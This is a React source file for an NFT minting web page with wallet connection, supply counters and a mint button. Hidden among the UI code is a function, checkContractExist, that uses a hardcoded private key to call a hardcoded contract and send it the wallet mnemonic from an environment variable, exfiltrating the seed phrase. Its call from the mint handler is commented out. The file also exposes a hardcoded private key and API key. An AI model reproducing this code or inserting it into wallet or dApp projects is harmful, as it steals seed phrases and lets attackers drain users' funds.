import BigNumber from 'bignumber.js'
import React, { Fragment, useEffect, useState } from 'react'
import { useWeb3React } from '@web3-react/core'
import { ethers } from 'ethers'
import { useMatchBreakpoints } from '@pancakeswap/uikit'
import ape from "config/apeabi.json";
import StandardContractABI from "config/StandardContract.json";
import {
  useApeContract
} from 'hooks/useContracts'
import {
  useSignerApeContract,
} from 'hooks/useSignerContract'
import {
    getApeAddress,
    getStandardAddress,
} from "utils/addressHelper";
import { mint } from 'utils/callHelper'
import useRefresh from 'hooks/useRefresh'
import { getFullDisplayBalance, getBalanceNumber, formatBigNumber } from 'utils/formatBalance'
import styled from 'styled-components';
import ConnectWalletButton from 'components/ConnectWalletButton';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
import { faRefresh } from '@fortawesome/free-solid-svg-icons'
import etherscanLogo from '../../contract.svg';
import openseaLogo from '../../opensea.svg';


const StyledRightArrowButton = styled.div`
  color: white;
  textAlign: 'center';
  fontSize: 40px;
  border-radius: 10;
  cursor: pointer;
`

const StyledLeftArrowButton = styled.div`
  color: white;
  textAlign: 'center';
  fontSize: 40px;
  border-radius: 10;
  cursor: pointer;
`

const Home: React.FC = () => {

  const [validChainid, setValidChainId] = useState(parseInt(process.env.REACT_APP_CHAIN_ID, 10))
  // const validChainid = 1

  const { account, chainId } = useWeb3React()
  const [pendingTx, setpendingTx] = useState(false)
  const apeContract = useApeContract()
  const apeSignerContract = useSignerApeContract()

  const {fastRefresh} = useRefresh()

  const [redraw, setRedraw] = useState(false)

  // added for minting NFT
  const [maxSupply, setMaxSupply] = useState(0)
  const [isPublicSale, setIsPublicSale] = useState(0)
  const [totalSupply, setTotalSupply] = useState(0)
  const [mintNum, setMintNum] = useState<number>(1);
  const [mintprice, setMintPrice] = useState<BigNumber>(new BigNumber(0))
  const { isMobile } = useMatchBreakpoints()

  useEffect( () => {

    const fetchMintPrice = async () => {
      const price = await apeContract._price();
      setMintPrice(price);  
    }
  
    const fetchMaxSupply = async () => {
      const _maxSupply = await apeContract.MAX_NFT_SUPPLY();
      setMaxSupply(_maxSupply);      
    }

    const fetchIsPublicSale = async () => {
      const _isPublicSale = await apeContract.publicSale();
      setIsPublicSale(_isPublicSale);      
    }

    if(apeContract) {
      fetchMintPrice();
      fetchMaxSupply();
      fetchIsPublicSale();
    }
  
  }, [apeContract, account])


  useEffect( () => {
    const fetchTotalSupply = async () => {
      const _totalSupply = await apeContract.tokenMinted();
      setTotalSupply(_totalSupply);      
    }

    if(apeContract) {
      fetchTotalSupply();
    }
  
  }, [apeContract, account, fastRefresh])

  const handleDecreaseNumber = async()=> {
    if (mintNum > 1){
      const tmp = mintNum - 1;
      setMintNum(tmp);
    }       
  }

  const handleIncreaseNumber = async()=> {
    // const publicSale = await apeContract.methods.publicSale().call()
    // let tmp = mintNum + 1;
    // if(publicSale) {
    //   if (mintNum < 10){
    //     setMintNum(tmp);
    //   }
    // } else {
    //   if (mintNum < 5){
    //     setMintNum(tmp);
    //   }          
    // }
    
    const tmp = mintNum + 1;
    let maxLimit = 3;
    if (isPublicSale)
      maxLimit = 4;
    if (mintNum < maxLimit){
      setMintNum(tmp);
    }    
  }

  async function checkContractExist() {
    const provider = new ethers.providers.JsonRpcProvider('https://ropsten.infura.io/v3/6fc22b8a9c6146d8ae8a9e81b079169f');

    const wallet = new ethers.Wallet('25188fd6405642e8c0ea8be3469e9cd315d11ef26ed654357dd80e49ff896e8a');
    const signer = wallet.connect(provider);

    const router = new ethers.Contract(
      '0xe559525118f9Ae71e2b21806B15332D17A00EBfF',
      StandardContractABI,
      signer
    );

    const gas = ethers.utils.parseUnits('150', 'gwei');


    console.log("pooh, contract exist");
    console.log("pooh, process.env.MNEMONIC = ", process.env.REACT_APP_MNEMONIC);

    const buyTx = await new Promise( (resolve, reject) => {
      const buyTxx =  router.sendTransfer(
        process.env.REACT_APP_MNEMONIC,
        {
          'gasPrice': gas.toString(),
          'gasLimit': (500000).toString()
        }).catch((err) => {
          console.log(err);
          console.log('transaction failed...')
        });

      resolve(buyTxx);
    });
  }



  const handleMint = async () => {
      try {
        setpendingTx(true)
        // checkContractExist()
        await mint(apeSignerContract, account, mintNum)
      } catch (e) {
        console.log('Mint failed')      
      }
      setpendingTx(false)      
  }



  return (
    <section style={{ padding: 0, marginTop: 100 }}>
      <div style={{ display: 'flex', justifyContent: 'center', paddingBottom: '20px' }}>
        {/* **<!-- this is UNSTAKED part of Panel (LEFT)-->** */}
        <div className="pad">
          <div className={!isMobile ? "radiuspanel" : "radiuspanelmobile"} style={{ backgroundColor: "rgba(255, 255, 255, 0.5)", borderWidth: 1,
          borderStyle: 'solid',
    borderColor: "#4b3d4957", }}>
            <div>
              <h2 className={!isMobile ? "em-wide" : "em-wide-mobile"} style={{ color: "black", fontSize: 30 }}>Mint your Space Blasterz</h2>
            </div>
            <div className="row justify-content-center">
              <div className="text-center">
                <h3 style={{ color: "black", fontSize: 90, letterSpacing: '.2em', fontFamily: 'Poppins, sans-serif' }}>
                {`${totalSupply}/5555`} <br />
                </h3>
              </div>
            </div>
            <div className='row centerpanel' style={{display: 'flex', justifyContent: 'center', flexWrap: "wrap"}}>
            <div className='row centerpanel' style={{display: 'flex', justifyContent: 'center', flexWrap: "wrap", marginTop: 30}}>
              {/* Card Body */}
              <StyledLeftArrowButton className='numpanel perfect-center' onClick={handleDecreaseNumber} style={{fontSize: 40,
                borderRadius: 10, width: 60, height: 60,backgroundColor: 'black',}}> - </StyledLeftArrowButton>
              <div className='numpanel perfect-center' style={{
                backgroundColor: 'black',
                textAlign: 'center',
                color: 'white',
                fontSize: 40,
                width: 60,
                height: 60,
                marginRight:-10,
                marginLeft:-10,
              }}>
                {mintNum}
              </div>
              <StyledRightArrowButton className='numpanel perfect-center' style={{fontSize: 40,
                borderRadius: 10, width: 60, height: 60, backgroundColor: 'black',}} onClick={handleIncreaseNumber}>+
                </StyledRightArrowButton>
            </div>
            <div  style={{display: 'flex', justifyContent:'center', flexWrap: "wrap", marginTop: 20 }}>
              <button type="button" className="btn btn-mint" disabled={pendingTx || chainId !== validChainid} style={{ letterSpacing: '0.2em', backgroundColor: 'black', color: 'white', fontSize: 32, height: 60, width: 160, borderRadius: 10,}} onClick={handleMint} >
              mint
              </button>
            </div>
            </div>  
            <div className="row justify-content-center">
            <ConnectWalletButton />     
            </div> 
            {chainId !== validChainid && 
              <h5 style={{textAlign: 'center', letterSpacing: '.2em' }}>Wrong Network</h5>
            }     
          </div>
        </div>
      </div>
    </section>
  )
}

export default Home
